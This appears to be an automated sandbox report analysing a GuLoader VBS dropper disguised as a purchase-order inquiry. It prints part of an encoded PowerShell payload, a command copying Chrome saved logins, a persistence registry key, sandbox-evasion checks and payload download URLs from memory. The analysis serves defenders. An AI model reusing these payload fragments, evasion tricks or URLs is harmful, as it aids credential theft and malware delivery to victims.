cABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAI Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6913.tmp" "c:\Users\user\AppData\Local\Temp\vsdke30k\CSC2B92EBAA3FFD4AC6819286896BCEF79.TMP" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220121 Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\blueb.dat Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@14/16@4/1
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_01
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\New _Inquiry P.O4622.vbs"
Source: C:\Windows\SysWOW64\svchost.exe File written: C:\Users\user\AppData\Roaming\LQM-8D39\LQMlogri.ini Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000013.00000002.1065593654.000000001E9C0000.00000040.00000001.sdmp, ieinstal.exe, 00000013.00000002.1065764939.000000001EADF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000013.00000002.1065593654.000000001E9C0000.00000040.00000001.sdmp, ieinstal.exe, 00000013.00000002.1065764939.000000001EADF000.00000040.00000001.sdmp, svchost.exe
Source: Binary string: svchost.pdb source: ieinstal.exe, 00000013.00000002.1060938657.00000000027A0000.00000040.00020000.sdmp, ieinstal.exe, 00000013.00000003.1058405336.0000000002DD4000.00000004.00000001.sdmp
Source: Binary string: svchost.pdbUGP source: ieinstal.exe, 00000013.00000002.1060938657.00000000027A0000.00000040.00020000.sdmp, ieinstal.exe, 00000013.00000003.1058405336.0000000002DD4000.00000004.00000001.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("C:\Windows\SysWOW64\WindowsPowerShell\v", " -EncodedCommand "IwBMAEEAQwBUAEkARgBFA", "", "", "0")
Yara detected GuLoader
Source: Yara match File source: 00000013.00000000.950104658.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0493203F push eax; iretd 13_2_04932015
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA3D0D1 push ecx; ret 19_2_1EA3D0E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0327D0D1 push ecx; ret 22_2_0327D0E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DA842 push edx; retf 22_2_006DA843
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DC883 push 00000038h; retf 22_2_006DC88F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006C63D7 push 00000019h; ret 22_2_006C63DD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DD4B5 push eax; ret 22_2_006DD508
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DD56C push eax; ret 22_2_006DD572
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DD50B push eax; ret 22_2_006DD572
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006DD502 push eax; ret 22_2_006DD508
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_006D9FB6 push es; iretd 22_2_006D9FBD
Compiles C# or VB.Net code
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.cmdline Jump to behavior

Persistence and Installation Behavior
barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.dll Jump to dropped file

Boot Survival
barindex
Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\svchost.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run DDFDTFWP Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE0
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Potential evasive VBS script found (sleep loop)
Source: Initial file Initial file: For i = 1 To len(h) step 2 if i mod 21 = 0 then Wscript.Sleep(1)
Tries to detect Any.run
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmp Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSTARTUP KEYHTTPS://OWANLAB.COM/BIN_DZIINE252.BINHTTPS://GSMSERVICE.TECH/BIN_DZIINE252.BIN
Source: powershell.exe, 0000000D.00000003.948189598.0000000007A86000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1026417858.0000000007A80000.00000004.00000001.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE~
Source: powershell.exe, 0000000D.00000002.1026909764.0000000007B1D000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.947961634.0000000007B16000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.947999087.0000000007B1C000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 00000000006C9904 second address: 00000000006C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 00000000006C9B7E second address: 00000000006C9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6416 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.dll Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA26DE6 rdtsc 19_2_1EA26DE6
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4089 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2858 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe API coverage: 5.6 %
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation Jump to behavior
Source: powershell.exe, 0000000D.00000003.873648723.000000000547C000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: explorer.exe, 00000015.00000000.1043640137.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: ieinstal.exe, 00000013.00000003.996326865.0000000002D7C000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000003.1058515424.0000000002D7C000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.1061456480.0000000002D7C000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000015.00000000.1021896089.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000015.00000000.1006326818.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: powershell.exe, 0000000D.00000002.1026909764.0000000007B1D000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.947961634.0000000007B16000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.947999087.0000000007B1C000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: powershell.exe, 0000000D.00000003.948189598.0000000007A86000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1026417858.0000000007A80000.00000004.00000001.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe~
Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: explorer.exe, 00000015.00000000.1043887336.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: explorer.exe, 00000015.00000000.1043640137.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: powershell.exe, 0000000D.00000003.873648723.000000000547C000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmp Binary or memory string: }l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
